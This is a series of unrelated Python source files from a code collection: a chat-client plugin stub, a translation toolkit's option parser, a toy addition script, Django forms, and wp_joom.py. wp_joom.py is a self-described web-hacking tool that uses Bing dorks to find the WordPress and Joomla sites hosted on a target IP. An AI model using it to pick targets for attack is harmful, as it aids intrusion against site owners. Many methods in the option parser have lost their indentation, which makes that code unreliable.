    """Load the plugin module named plugin_name (stub, not yet implemented)."""
    pass
# unLoadPlugin(plugin_name)
# Called to unload a plugin. Name is name as set in plugin's XML.
def unLoadPlugin(plugin_name):
    """Unload the plugin named plugin_name (stub, not yet implemented)."""
    pass
# registerPlugin(plugin_instance)
# Saves the instance of the plugin, and registers it in the loaded list.
def registerPlugin(plugin_instance):
    """Register a running plugin instance (stub, not yet implemented)."""
    pass
# getPlugins()
# Returns a list of all available plugins, as in ['Plugin 1', 'Plugin 2']
def getPlugins():
    """Return the names of all available plugins (stub, not yet implemented)."""
    pass
# getPluginsWithStatus()
# Returns a list with a list item for each plugin with the plugin's name, and Loaded or NotLoaded either way.
# IE: [['Plugin 1', 'Loaded'], ['Plugin 2', 'NotLoaded']]
def getPluginsWithStatus():
    """Return [name, status] pairs for all plugins (stub, not yet implemented)."""
    pass
# getLoadedPlugins()
# Returns a list of loaded plugins. as in ['Plugin 1', 'Plugin N']
def getLoadedPlugins():
    """Return the names of currently loaded plugins (stub, not yet implemented)."""
    pass
# findPlugin(plugin_name)
# Retruns the running instance of the plugin with name plugin_name, or None if not found.
def findPlugin(plugin_name):
    """Return the running instance of plugin_name, or None (stub, not yet implemented)."""
    pass
# saveConfig(plugin_name, data)
def saveConfig(plugin_name, data):
    """Persist configuration data for plugin_name (stub, not yet implemented)."""
    pass
# Module import side effect: run the init procedure.
# Only executes on the first import, since Python caches modules in
# sys.modules.
init()
| kakaroto/amsn2 | amsn2/plugins/core.py | Python | gpl-2.0 | 1,882 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2002-2006 Zuza Software Foundation
#
# This file is part of translate.
#
# translate is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# translate is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>.
import fnmatch
import logging
import optparse
import os.path
import re
import six
import sys
import traceback
from io import BytesIO
from translate import __version__
from translate.misc import progressbar
class ManPageOption(optparse.Option, object):
    """An optparse Option subclass that supports a custom "manpage" action.

    When the action fires, the owning parser's print_manpage() is invoked
    and the process exits successfully.
    """

    # Extend the stock optparse actions with our "manpage" action.
    ACTIONS = optparse.Option.ACTIONS + ("manpage",)

    def take_action(self, action, dest, opt, value, values, parser):
        """take_action that can handle manpage as well as standard actions"""
        if action == "manpage":
            parser.print_manpage()
            sys.exit(0)
        return super(ManPageOption, self).take_action(action, dest, opt, value,
                                                      values, parser)
class ManHelpFormatter(optparse.HelpFormatter):
    """Format optparse help output using troff/man-page markup."""

    def __init__(self,
                 indent_increment=0,
                 max_help_position=0,
                 width=80,
                 short_first=1):
        optparse.HelpFormatter.__init__(
            self, indent_increment, max_help_position, width, short_first)

    def format_option_strings(self, option):
        """Return a comma-separated list of option strings & metavariables."""
        if option.takes_value():
            # Render the metavariable in italics: \fI...\fP
            metavar = "\\fI%s\\fP" % (option.metavar or option.dest.upper())
            short_opts = ["%s%s" % (sopt, metavar)
                          for sopt in option._short_opts]
            long_opts = ["%s\\fR=\\fP%s" % (lopt, metavar)
                         for lopt in option._long_opts]
        else:
            short_opts = list(option._short_opts)
            long_opts = list(option._long_opts)
        ordered = (short_opts + long_opts if self.short_first
                   else long_opts + short_opts)
        # Render the whole option list in bold: \fB...\fP
        return "\\fB%s\\fP" % "\\fR, \\fP".join(ordered)
class RecursiveOptionParser(optparse.OptionParser, object):
"""A specialized Option Parser for recursing through directories."""
    def __init__(self, formats, usetemplates=False, allowmissingtemplate=False,
                 description=None):
        """Construct the specialized Option Parser.

        :type formats: Dictionary
        :param formats: See :meth:`~.RecursiveOptionParser.setformats`
                        for an explanation of the formats parameter.
        :param usetemplates: whether the tool also accepts a template file
            (adds the -t/--template option)
        :param allowmissingtemplate: process inputs even when no matching
            template file is found (checked in recursiveprocess)
        """
        # Version string is taken from the Translate Toolkit release.
        optparse.OptionParser.__init__(self, version="%prog " + __version__.sver,
                                       description=description)
        self.setmanpageoption()
        self.setprogressoptions()
        self.seterrorleveloptions()
        self.setformats(formats, usetemplates)
        # Option dest names listed here are forwarded to the processor method.
        self.passthrough = []
        self.allowmissingtemplate = allowmissingtemplate
        # Configure the root logger format used by warning().
        logging.basicConfig(format="%(name)s: %(levelname)s: %(message)s")
def get_prog_name(self):
return os.path.basename(sys.argv[0])
def setmanpageoption(self):
"""creates a manpage option that allows the optionparser to generate a
manpage"""
manpageoption = ManPageOption(None, "--manpage", dest="manpage",
default=False, action="manpage",
help="output a manpage based on the help")
self.define_option(manpageoption)
def format_manpage(self):
"""returns a formatted manpage"""
result = []
prog = self.get_prog_name()
formatprog = lambda x: x.replace("%prog", prog)
formatToolkit = lambda x: x.replace("%prog", "Translate Toolkit")
result.append('.\\" Autogenerated manpage\n')
result.append('.TH %s 1 "%s" "" "%s"\n' % (prog,
formatToolkit(self.version),
formatToolkit(self.version)))
result.append('.SH NAME\n')
result.append('%s \\- %s\n' % (self.get_prog_name(),
self.description.split('\n\n')[0]))
result.append('.SH SYNOPSIS\n')
result.append('.PP\n')
usage = "\\fB%prog "
usage += " ".join([self.getusageman(option) for option in self.option_list])
usage += "\\fP"
result.append('%s\n' % formatprog(usage))
description_lines = self.description.split('\n\n')[1:]
if description_lines:
result.append('.SH DESCRIPTION\n')
result.append('\n\n'.join([re.sub('\.\. note::', 'Note:', l)
for l in description_lines]))
result.append('.SH OPTIONS\n')
ManHelpFormatter().store_option_strings(self)
result.append('.PP\n')
for option in self.option_list:
result.append('.TP\n')
result.append('%s\n' % str(option).replace('-', '\-'))
result.append('%s\n' % option.help.replace('-', '\-'))
return "".join(result)
def print_manpage(self, file=None):
"""outputs a manpage for the program using the help information"""
if file is None:
file = sys.stdout
file.write(self.format_manpage())
def set_usage(self, usage=None):
"""sets the usage string - if usage not given, uses getusagestring for
each option"""
if usage is None:
self.usage = "%prog " + " ".join([self.getusagestring(option) for option in self.option_list])
else:
super(RecursiveOptionParser, self).set_usage(usage)
    def warning(self, msg, options=None, exc_info=None):
        """Print a warning message incorporating 'msg' to stderr and exit."""
        # NOTE(review): despite the docstring, this logs a warning and
        # returns; it does not exit.  exc_info is assumed non-None whenever
        # options.errorlevel requests exception detail — TODO confirm callers.
        if options:
            if options.errorlevel == "traceback":
                errorinfo = "\n".join(traceback.format_exception(exc_info[0],
                                                                 exc_info[1], exc_info[2]))
            elif options.errorlevel == "exception":
                errorinfo = "\n".join(traceback.format_exception_only(exc_info[0], exc_info[1]))
            elif options.errorlevel == "message":
                errorinfo = str(exc_info[1])
            else:
                # errorlevel "none" (or anything unrecognised): message only.
                errorinfo = ""
            if errorinfo:
                msg += ": " + errorinfo
        # Logger is named after the running program.
        logging.getLogger(self.get_prog_name()).warning(msg)
def getusagestring(self, option):
"""returns the usage string for the given option"""
optionstring = "|".join(option._short_opts + option._long_opts)
if getattr(option, "optionalswitch", False):
optionstring = "[%s]" % optionstring
if option.metavar:
optionstring += " " + option.metavar
if getattr(option, "required", False):
return optionstring
else:
return "[%s]" % optionstring
def getusageman(self, option):
"""returns the usage string for the given option"""
optionstring = "\\fR|\\fP".join(option._short_opts + option._long_opts)
if getattr(option, "optionalswitch", False):
optionstring = "\\fR[\\fP%s\\fR]\\fP" % optionstring
if option.metavar:
optionstring += " \\fI%s\\fP" % option.metavar
if getattr(option, "required", False):
return optionstring
else:
return "\\fR[\\fP%s\\fR]\\fP" % optionstring
def define_option(self, option):
"""Defines the given option, replacing an existing one of the same short
name if neccessary..."""
for short_opt in option._short_opts:
if self.has_option(short_opt):
self.remove_option(short_opt)
for long_opt in option._long_opts:
if self.has_option(long_opt):
self.remove_option(long_opt)
self.add_option(option)
def setformats(self, formats, usetemplates):
"""Sets the format options using the given format dictionary.
:type formats: Dictionary
:param formats: The dictionary *keys* should be:
- Single strings (or 1-tuples) containing an
input format (if not *usetemplates*)
- Tuples containing an input format and
template format (if *usetemplates*)
- Formats can be *None* to indicate what to do
with standard input
The dictionary *values* should be tuples of
outputformat (string) and processor method.
"""
inputformats = []
outputformats = []
templateformats = []
self.outputoptions = {}
self.usetemplates = usetemplates
for formatgroup, outputoptions in six.iteritems(formats):
if isinstance(formatgroup, (str, unicode)) or formatgroup is None:
formatgroup = (formatgroup, )
if not isinstance(formatgroup, tuple):
raise ValueError("formatgroups must be tuples or None/str/unicode")
if len(formatgroup) < 1 or len(formatgroup) > 2:
raise ValueError("formatgroups must be tuples of length 1 or 2")
if len(formatgroup) == 1:
formatgroup += (None, )
inputformat, templateformat = formatgroup
if not isinstance(outputoptions, tuple) or len(outputoptions) != 2:
raise ValueError("output options must be tuples of length 2")
outputformat, processor = outputoptions
if not inputformat in inputformats:
inputformats.append(inputformat)
if not outputformat in outputformats:
outputformats.append(outputformat)
if not templateformat in templateformats:
templateformats.append(templateformat)
self.outputoptions[(inputformat, templateformat)] = (outputformat, processor)
self.inputformats = inputformats
inputformathelp = self.getformathelp(inputformats)
inputoption = optparse.Option("-i", "--input", dest="input",
default=None, metavar="INPUT",
help="read from INPUT in %s" % (inputformathelp))
inputoption.optionalswitch = True
inputoption.required = True
self.define_option(inputoption)
excludeoption = optparse.Option("-x", "--exclude", dest="exclude",
action="append", type="string", metavar="EXCLUDE",
default=["CVS", ".svn", "_darcs", ".git", ".hg", ".bzr"],
help="exclude names matching EXCLUDE from input paths")
self.define_option(excludeoption)
outputformathelp = self.getformathelp(outputformats)
outputoption = optparse.Option("-o", "--output", dest="output",
default=None, metavar="OUTPUT",
help="write to OUTPUT in %s" % (outputformathelp))
outputoption.optionalswitch = True
outputoption.required = True
self.define_option(outputoption)
if self.usetemplates:
self.templateformats = templateformats
templateformathelp = self.getformathelp(self.templateformats)
templateoption = optparse.Option("-t", "--template",
dest="template", default=None, metavar="TEMPLATE",
help="read from TEMPLATE in %s" % (templateformathelp))
self.define_option(templateoption)
def setprogressoptions(self):
"""Sets the progress options."""
self.progresstypes = {
"none": progressbar.NoProgressBar,
"bar": progressbar.HashProgressBar,
"dots": progressbar.DotsProgressBar,
"names": progressbar.MessageProgressBar,
"verbose": progressbar.VerboseProgressBar,
}
progressoption = optparse.Option(None, "--progress", dest="progress",
default="bar",
choices=self.progresstypes.keys(), metavar="PROGRESS",
help="show progress as: %s" % (", ".join(self.progresstypes)))
self.define_option(progressoption)
def seterrorleveloptions(self):
"""Sets the errorlevel options."""
self.errorleveltypes = ["none", "message", "exception", "traceback"]
errorleveloption = optparse.Option(None, "--errorlevel",
dest="errorlevel", default="message",
choices=self.errorleveltypes, metavar="ERRORLEVEL",
help="show errorlevel as: %s" %
(", ".join(self.errorleveltypes)))
self.define_option(errorleveloption)
def getformathelp(self, formats):
"""Make a nice help string for describing formats..."""
formats = sorted(formats)
if None in formats:
formats = filter(lambda format: format is not None, formats)
if len(formats) == 0:
return ""
elif len(formats) == 1:
return "%s format" % (", ".join(formats))
else:
return "%s formats" % (", ".join(formats))
def isrecursive(self, fileoption, filepurpose='input'):
"""Checks if fileoption is a recursive file."""
if fileoption is None:
return False
elif isinstance(fileoption, list):
return True
else:
return os.path.isdir(fileoption)
    def parse_args(self, args=None, values=None):
        """Parses the command line options, handling implicit input/output
        args."""
        (options, args) = super(RecursiveOptionParser, self).parse_args(args, values)
        # some intelligent as to what reasonable people might give on the
        # command line
        if args and not options.input:
            # Freestanding args: all but the last become inputs; the last
            # one remains a candidate for the output slot below.
            if len(args) > 1:
                options.input = args[:-1]
                args = args[-1:]
            else:
                options.input = args[0]
                args = []
        if args and not options.output:
            options.output = args[-1]
            args = args[:-1]
        if args:
            # Anything left over cannot be interpreted sensibly.
            self.error("You have used an invalid combination of --input, --output and freestanding args")
        # A single-element input list degrades to a plain path.
        if isinstance(options.input, list) and len(options.input) == 1:
            options.input = options.input[0]
        if options.input is None:
            self.error("You need to give an inputfile or use - for stdin ; use --help for full usage instructions")
        elif options.input == '-':
            # '-' conventionally means stdin; None signals that downstream.
            options.input = None
        return (options, args)
def getpassthroughoptions(self, options):
"""Get the options required to pass to the filtermethod..."""
passthroughoptions = {}
for optionname in dir(options):
if optionname in self.passthrough:
passthroughoptions[optionname] = getattr(options, optionname)
return passthroughoptions
    def getoutputoptions(self, options, inputpath, templatepath):
        """Works out which output format and processor method to use...

        Resolves the (input extension, template extension) pair against
        options.outputoptions, trying progressively more generic keys:
        exact pair, wildcard ("*") input/template, extension with no
        template, then wildcard-only combinations.
        """
        if inputpath:
            inputbase, inputext = self.splitinputext(inputpath)
        else:
            inputext = None
        if templatepath:
            templatebase, templateext = self.splittemplateext(templatepath)
        else:
            templateext = None
        # Exact match returns immediately; wildcard matches fall through so
        # that a "*" output format can be resolved below.
        if (inputext, templateext) in options.outputoptions:
            return options.outputoptions[inputext, templateext]
        elif (inputext, "*") in options.outputoptions:
            outputformat, fileprocessor = options.outputoptions[inputext, "*"]
        elif ("*", templateext) in options.outputoptions:
            outputformat, fileprocessor = options.outputoptions["*", templateext]
        elif ("*", "*") in options.outputoptions:
            outputformat, fileprocessor = options.outputoptions["*", "*"]
        elif (inputext, None) in options.outputoptions:
            return options.outputoptions[inputext, None]
        elif (None, templateext) in options.outputoptions:
            return options.outputoptions[None, templateext]
        elif ("*", None) in options.outputoptions:
            outputformat, fileprocessor = options.outputoptions["*", None]
        elif (None, "*") in options.outputoptions:
            outputformat, fileprocessor = options.outputoptions[None, "*"]
        else:
            # No key matched: build the most specific error message we can.
            if self.usetemplates:
                if inputext is None:
                    raise ValueError("don't know what to do with input format (no file extension), no template file")
                elif templateext is None:
                    raise ValueError("don't know what to do with input format %s, no template file" %
                                     (os.extsep + inputext))
                else:
                    raise ValueError("don't know what to do with input format %s, template format %s" %
                                     (os.extsep + inputext, os.extsep + templateext))
            else:
                raise ValueError("don't know what to do with input format %s" %
                                 (os.extsep + inputext))
        if outputformat == "*":
            # Wildcard output: inherit the input (or template) extension.
            if inputext:
                outputformat = inputext
            elif templateext:
                outputformat = templateext
            elif ("*", "*") in options.outputoptions:
                outputformat = None
            else:
                if self.usetemplates:
                    raise ValueError("don't know what to do with input format (no file extension), no template file")
                else:
                    raise ValueError("don't know what to do with input format (no file extension)")
        return outputformat, fileprocessor
def initprogressbar(self, allfiles, options):
"""Sets up a progress bar appropriate to the options and files."""
if options.progress in ('bar', 'verbose'):
self.progressbar = \
self.progresstypes[options.progress](0, len(allfiles))
# should use .getChild("progress") but that is only in 2.7
logger = logging.getLogger(self.get_prog_name() + ".progress")
logger.setLevel(logging.INFO)
logger.propagate = False
handler = logging.StreamHandler()
handler.setLevel(logging.INFO)
handler.setFormatter(logging.Formatter())
logger.addHandler(handler)
logger.info("processing %d files...", len(allfiles))
else:
self.progressbar = self.progresstypes[options.progress]()
def getfullinputpath(self, options, inputpath):
"""Gets the absolute path to an input file."""
if options.input:
return os.path.join(options.input, inputpath)
else:
return inputpath
def getfulloutputpath(self, options, outputpath):
"""Gets the absolute path to an output file."""
if options.recursiveoutput and options.output:
return os.path.join(options.output, outputpath)
else:
return outputpath
def getfulltemplatepath(self, options, templatepath):
"""Gets the absolute path to a template file."""
if not options.recursivetemplate:
return templatepath
elif (templatepath is not None and
self.usetemplates and options.template):
return os.path.join(options.template, templatepath)
else:
return None
    def run(self):
        """Parses the arguments, and runs recursiveprocess with the resulting
        options..."""
        (options, args) = self.parse_args()
        # this is so derived classes can modify the inputformats etc based on
        # the options
        options.inputformats = self.inputformats
        options.outputoptions = self.outputoptions
        self.recursiveprocess(options)
def recursiveprocess(self, options):
"""Recurse through directories and process files."""
if self.isrecursive(options.input, 'input') and getattr(options, "allowrecursiveinput", True):
if not self.isrecursive(options.output, 'output'):
if not options.output:
self.error(optparse.OptionValueError("No output directory given"))
try:
self.warning("Output directory does not exist. Attempting to create")
os.mkdir(options.output)
except IOError as e:
self.error(optparse.OptionValueError("Output directory does not exist, attempt to create failed"))
if isinstance(options.input, list):
inputfiles = self.recurseinputfilelist(options)
else:
inputfiles = self.recurseinputfiles(options)
else:
if options.input:
inputfiles = [os.path.basename(options.input)]
options.input = os.path.dirname(options.input)
else:
inputfiles = [options.input]
options.recursiveoutput = (self.isrecursive(options.output, 'output') and
getattr(options, "allowrecursiveoutput", True))
options.recursivetemplate = (self.usetemplates and
self.isrecursive(options.template, 'template') and
getattr(options, "allowrecursivetemplate", True))
self.initprogressbar(inputfiles, options)
for inputpath in inputfiles:
try:
templatepath = self.gettemplatename(options, inputpath)
# If we have a recursive template, but the template doesn't
# have this input file, let's drop it.
if (options.recursivetemplate and templatepath is None and
not self.allowmissingtemplate):
self.warning("No template at %s. Skipping %s." %
(templatepath, inputpath))
continue
outputformat, fileprocessor = self.getoutputoptions(options, inputpath, templatepath)
fullinputpath = self.getfullinputpath(options, inputpath)
fulltemplatepath = self.getfulltemplatepath(options,
templatepath)
outputpath = self.getoutputname(options, inputpath, outputformat)
fulloutputpath = self.getfulloutputpath(options, outputpath)
if options.recursiveoutput and outputpath:
self.checkoutputsubdir(options, os.path.dirname(outputpath))
except Exception:
self.warning("Couldn't handle input file %s" %
inputpath, options, sys.exc_info())
continue
try:
success = self.processfile(fileprocessor, options,
fullinputpath, fulloutputpath,
fulltemplatepath)
except Exception:
self.warning("Error processing: input %s, output %s, template %s" %
(fullinputpath, fulloutputpath,
fulltemplatepath), options, sys.exc_info())
success = False
self.reportprogress(inputpath, success)
del self.progressbar
def openinputfile(self, options, fullinputpath):
"""Opens the input file."""
if fullinputpath is None:
return sys.stdin
return open(fullinputpath, 'r')
def openoutputfile(self, options, fulloutputpath):
"""Opens the output file."""
if fulloutputpath is None:
return sys.stdout
return open(fulloutputpath, 'w')
def opentempoutputfile(self, options, fulloutputpath):
"""Opens a temporary output file."""
return BytesIO()
def finalizetempoutputfile(self, options, outputfile, fulloutputpath):
"""Write the temp outputfile to its final destination."""
outputfile.reset()
outputstring = outputfile.read()
outputfile = self.openoutputfile(options, fulloutputpath)
outputfile.write(outputstring)
outputfile.close()
def opentemplatefile(self, options, fulltemplatepath):
"""Opens the template file (if required)."""
if fulltemplatepath is not None:
if os.path.isfile(fulltemplatepath):
return open(fulltemplatepath, 'r')
else:
self.warning("missing template file %s" % fulltemplatepath)
return None
    def processfile(self, fileprocessor, options, fullinputpath,
                    fulloutputpath, fulltemplatepath):
        """Process an individual file.

        Returns True on success.  On failure the (real, non-temporary)
        output file is removed so no partial output is left behind.
        """
        inputfile = self.openinputfile(options, fullinputpath)
        # If output would clobber the input or template file, stage the
        # result in a temporary in-memory buffer first.
        if (fulloutputpath and
                fulloutputpath in (fullinputpath, fulltemplatepath)):
            outputfile = self.opentempoutputfile(options, fulloutputpath)
            tempoutput = True
        else:
            outputfile = self.openoutputfile(options, fulloutputpath)
            tempoutput = False
        templatefile = self.opentemplatefile(options, fulltemplatepath)
        passthroughoptions = self.getpassthroughoptions(options)
        # The processor's truthy return value signals success.
        if fileprocessor(inputfile, outputfile, templatefile,
                         **passthroughoptions):
            if tempoutput:
                self.warning("writing to temporary output...")
                self.finalizetempoutputfile(options, outputfile,
                                            fulloutputpath)
            return True
        else:
            # remove the file if it is a file (could be stdout etc)
            if fulloutputpath and os.path.isfile(fulloutputpath):
                outputfile.close()
                os.unlink(fulloutputpath)
            return False
def reportprogress(self, filename, success):
"""Shows that we are progressing..."""
self.progressbar.amount += 1
self.progressbar.show(filename)
def mkdir(self, parent, subdir):
"""Makes a subdirectory (recursively if neccessary)."""
if not os.path.isdir(parent):
raise ValueError("cannot make child directory %r if parent %r does not exist" %
(subdir, parent))
currentpath = parent
subparts = subdir.split(os.sep)
for part in subparts:
currentpath = os.path.join(currentpath, part)
if not os.path.isdir(currentpath):
os.mkdir(currentpath)
def checkoutputsubdir(self, options, subdir):
"""Checks to see if subdir under options.output needs to be created,
creates if neccessary."""
fullpath = os.path.join(options.output, subdir)
if not os.path.isdir(fullpath):
self.mkdir(options.output, subdir)
def isexcluded(self, options, inputpath):
"""Checks if this path has been excluded."""
basename = os.path.basename(inputpath)
for excludename in options.exclude:
if fnmatch.fnmatch(basename, excludename):
return True
return False
    def recurseinputfilelist(self, options):
        """Use a list of files, and find a common base directory for them."""
        # find a common base directory for the files to do everything
        # relative to
        # NOTE(review): os.path.commonprefix is character-based; the
        # dirname() wrapper keeps the result on a path boundary.
        commondir = os.path.dirname(os.path.commonprefix(options.input))
        inputfiles = []
        for inputfile in options.input:
            if self.isexcluded(options, inputfile):
                continue
            # Strip the common directory (and its separator) once, leaving
            # paths relative to commondir.
            if inputfile.startswith(commondir + os.sep):
                inputfiles.append(inputfile.replace(commondir + os.sep, "", 1))
            else:
                inputfiles.append(inputfile.replace(commondir, "", 1))
        # All later processing treats paths as relative to this base.
        options.input = commondir
        return inputfiles
def recurseinputfiles(self, options):
"""Recurse through directories and return files to be processed."""
dirstack = ['']
join = os.path.join
inputfiles = []
while dirstack:
top = dirstack.pop(-1)
names = os.listdir(join(options.input, top))
dirs = []
for name in names:
inputpath = join(top, name)
if self.isexcluded(options, inputpath):
continue
fullinputpath = self.getfullinputpath(options, inputpath)
# handle directories...
if os.path.isdir(fullinputpath):
dirs.append(inputpath)
elif os.path.isfile(fullinputpath):
if not self.isvalidinputname(options, name):
# only handle names that match recognized input
# file extensions
continue
inputfiles.append(inputpath)
# make sure the directories are processed next time round.
dirs.reverse()
dirstack.extend(dirs)
return inputfiles
def splitext(self, pathname):
"""Splits *pathname* into name and ext, and removes the extsep.
:param pathname: A file path
:type pathname: string
:return: root, ext
:rtype: tuple
"""
root, ext = os.path.splitext(pathname)
ext = ext.replace(os.extsep, "", 1)
return (root, ext)
def splitinputext(self, inputpath):
"""Splits an *inputpath* into name and extension."""
return self.splitext(inputpath)
def splittemplateext(self, templatepath):
"""Splits a *templatepath* into name and extension."""
return self.splitext(templatepath)
def templateexists(self, options, templatepath):
"""Returns whether the given template exists..."""
fulltemplatepath = self.getfulltemplatepath(options, templatepath)
return os.path.isfile(fulltemplatepath)
    def gettemplatename(self, options, inputname):
        """Gets an output filename based on the input filename.

        NOTE(review): despite the docstring wording, this resolves the
        *template* filename for *inputname*, or None when no template
        applies or exists on disk.
        """
        if not self.usetemplates:
            return None
        if not inputname or not options.recursivetemplate:
            # Non-recursive mode: a single fixed template (possibly None).
            return options.template
        inputbase, inputext = self.splitinputext(inputname)
        if options.template:
            # First try: exact input-extension matches in outputoptions.
            for inputext1, templateext1 in options.outputoptions:
                if inputext == inputext1:
                    if templateext1:
                        templatepath = inputbase + os.extsep + templateext1
                        if self.templateexists(options, templatepath):
                            return templatepath
            # Second try (wildcard input formats): "*" keys as well;
            # a "*" template extension means "same name as the input file".
            if "*" in options.inputformats:
                for inputext1, templateext1 in options.outputoptions:
                    if (inputext == inputext1) or (inputext1 == "*"):
                        if templateext1 == "*":
                            templatepath = inputname
                            if self.templateexists(options, templatepath):
                                return templatepath
                        elif templateext1:
                            templatepath = inputbase + os.extsep + templateext1
                            if self.templateexists(options, templatepath):
                                return templatepath
        return None
def getoutputname(self, options, inputname, outputformat):
"""Gets an output filename based on the input filename."""
if not inputname or not options.recursiveoutput:
return options.output
inputbase, inputext = self.splitinputext(inputname)
outputname = inputbase
if outputformat:
outputname += os.extsep + outputformat
return outputname
def isvalidinputname(self, options, inputname):
"""Checks if this is a valid input filename."""
inputbase, inputext = self.splitinputext(inputname)
return ((inputext in options.inputformats) or
("*" in options.inputformats))
| mail-apps/translate | translate/misc/optrecurse.py | Python | gpl-2.0 | 32,292 |
# Sum a list of decimal integers given as strings using schoolbook
# digit-by-digit addition with carry, then print the result.
# Fixes: replaced Python-2-only xrange and '/' (true division on Python 3
# would make the carry a float) so the script runs on Python 2 and 3; the
# debug print of (digit, carry) now prints an explicit tuple, matching the
# original Python 2 output.
a = ['999', '1']
# Width of the longest number: every operand is padded to this length.
max_length = len(max(a, key=len))
tem = 0
carry = 0
for i in range(len(a)):
    while len(a[i]) < max_length:
        a[i] = '0' + a[i]
# Reverse each number so index 0 is the least significant digit.
for x in range(len(a)):
    a[x] = a[x][::-1]
out = ''
for x in range(max_length):
    for i in a:
        tem += int(i[x])
        print((i[x], carry))  # debug trace: current digit and incoming carry
    tem += carry
    carry = 0
    print(tem)
    if tem > 9:
        carry = tem // 10  # floor division keeps the carry an integer
    out = str(tem % 10) + out
    tem = 0
# A final leftover carry becomes the leading digit.
if carry > 0:
    out = str(carry) + out
print(out)
import urllib
import os
import re
from time import sleep
from datetime import date
def welcome(modulename):
    """Print the tool banner followed by the given module name.

    Fix: uses single-argument print() calls, which are valid on both
    Python 2 (parenthesised expression) and Python 3; the original print
    statements were Python 2 only.
    """
    print("""
|==========================================================|
|====================== [ 404 ] ========================|
|==============[ lordnotfound404@gmail.com ]===============|
|==========[ https://www.facebook.com/404andreas]==========|
|==========================================================|
| **** Web Hacking framwork by 404 *** |
|==========================================================|
""")
    print('####### ' + modulename)
###########################################################
def _bing_scrape(dork, outpath, start=0, end=200):
    """Page through Bing results for *dork*, saving result hrefs to *outpath*.

    One page (10 results) is fetched per iteration; on a network error the
    same page is retried after a short pause, matching the original scripts'
    behaviour.  Extracted links are written to *outpath*, one per line.
    """
    out = open(outpath, 'w')
    sleep(3)
    find = []  # fix: was unbound if the very first fetch failed
    while start <= end:
        try:
            con = urllib.urlretrieve('http://www.bing.com/search?q=' + dork +
                                     "&first=" + str(start))
            page = open(con[0])
            find = re.findall('<h2><a href="(.*?)"', page.read())
            page.close()  # fix: result pages were never closed
            start = start + 10
        except IOError:
            print("[ERROR]network error ")
            print("[Info]reconnecting ")
            sleep(10)
            print("[Info]retrying ")
        try:
            for link in find:
                out.write(link + '\n')
        except IOError:
            print("[ERROR]No result found")
    out.close()


def serverTargeting(IP):
    """Run three Bing dork scans against *IP* (hosted domains, WordPress
    sites, Joomla sites), saving each result set to its own file.

    Fixes over the original: the triplicated scrape loop is factored into
    _bing_scrape, file handles are closed, and the `find` variable can no
    longer be referenced before assignment on an early network error.
    """
    welcome("perform many dork based scans")
    print(" New TARGET " + IP)
    print("[Info] : getting Hosted domains from Bing")
    _bing_scrape('IP:' + IP, IP + 'hosted.txt')
    print("[Info] : links list saved in file " + IP + "hosted.txt")
    print("[Info] : getting wordpress sites from server ....")
    _bing_scrape('IP:' + IP + " /wp-content/", IP + 'wp_Powred.txt')
    print("[Info] : links list saved in file " + IP + "wp_Powred.txt")
    print("[Info] : getting joomla sites from server ....")
    _bing_scrape('IP:' + IP + " index.php?option=com_content", IP + 'joom_Powred.txt')
    print("[Info] : links saved in file " + IP + "joom_Powred.txt")
    print(" ALL is done good luck dude !!!!! ")
###########################################################
# Entry point: guard against execution on import, and accept input on both
# Python 2 (raw_input) and Python 3 (input).
if __name__ == "__main__":
    welcome("Joomla and wordpress Sites Finder")
    try:
        _prompt = raw_input  # Python 2
    except NameError:
        _prompt = input  # Python 3
    IPadress = _prompt("[INFO] : enter IP adress : ")
    serverTargeting(IPadress)
| lordnotfound404/404web | wp_joom.py | Python | gpl-2.0 | 4,272 |
from django import forms
from django.contrib.auth.models import Group
from common.forms import ModelFormWithHelper
from common.helpers import SubmitCancelFormHelper
from community.constants import COMMUNITY_ADMIN
from community.models import Community, CommunityPage
from community.utils import get_groups
from users.models import SystersUser
class CommunityForm(ModelFormWithHelper):
    """Form to edit Community profile"""
    class Meta:
        model = Community
        # Editable profile fields, including social-media links.
        fields = ('name', 'slug', 'order', 'email', 'mailing_list',
                  'parent_community', 'website', 'facebook', 'googleplus',
                  'twitter')
        helper_class = SubmitCancelFormHelper
        # Cancel link returns to the community's profile page.
        helper_cancel_href = "{% url 'view_community_profile' " \
                             "community.slug %}"
class AddCommunityPageForm(ModelFormWithHelper):
    """Form to create new CommunityPage. The author and the community of the
    page are expected to be provided when initializing the form:

    * author - currently logged in user, aka the author of the page
    * community - to which Community the CommunityPage belongs
    """
    class Meta:
        model = CommunityPage
        fields = ('title', 'slug', 'order', 'content')
        helper_class = SubmitCancelFormHelper
        # Cancel link returns to the community landing page.
        helper_cancel_href = "{% url 'view_community_landing' " \
                             "community.slug %}"

    def __init__(self, *args, **kwargs):
        # Pop the extra kwargs before ModelForm sees them.
        self.author = kwargs.pop('author')
        self.community = kwargs.pop('community')
        super(AddCommunityPageForm, self).__init__(*args, **kwargs)

    def save(self, commit=True):
        """Override save to add author and community to the instance"""
        instance = super(AddCommunityPageForm, self).save(commit=False)
        # author is a User; resolve it to the matching SystersUser profile.
        instance.author = SystersUser.objects.get(user=self.author)
        instance.community = self.community
        if commit:
            instance.save()
        return instance
class EditCommunityPageForm(ModelFormWithHelper):
    """Form to edit a CommunityPage."""
    class Meta:
        model = CommunityPage
        fields = ('slug', 'title', 'order', 'content')
        helper_class = SubmitCancelFormHelper
        # Cancel link returns to the page being edited.
        helper_cancel_href = "{% url 'view_community_page' community.slug " \
                             "object.slug %}"
class PermissionGroupsForm(forms.Form):
    """Form to manage (select/deselect) user permission groups"""
    def __init__(self, *args, **kwargs):
        self.user = kwargs.pop('user')
        community = kwargs.pop('community')
        super(PermissionGroupsForm, self).__init__(*args, **kwargs)
        # get all community groups and remove community admin group
        # from the list of choices
        self.groups = list(get_groups(community.name))
        admin_group = Group.objects.get(
            name=COMMUNITY_ADMIN.format(community.name))
        self.groups.remove(admin_group)
        choices = [(group.pk, group.name) for group in self.groups]
        # Checkbox per remaining group; pre-check the ones the user is in.
        self.fields['groups'] = forms.\
            MultipleChoiceField(choices=choices, label="", required=False,
                                widget=forms.CheckboxSelectMultiple)
        self.member_groups = self.user.get_member_groups(self.groups)
        self.fields['groups'].initial = [group.pk for group in
                                         self.member_groups]
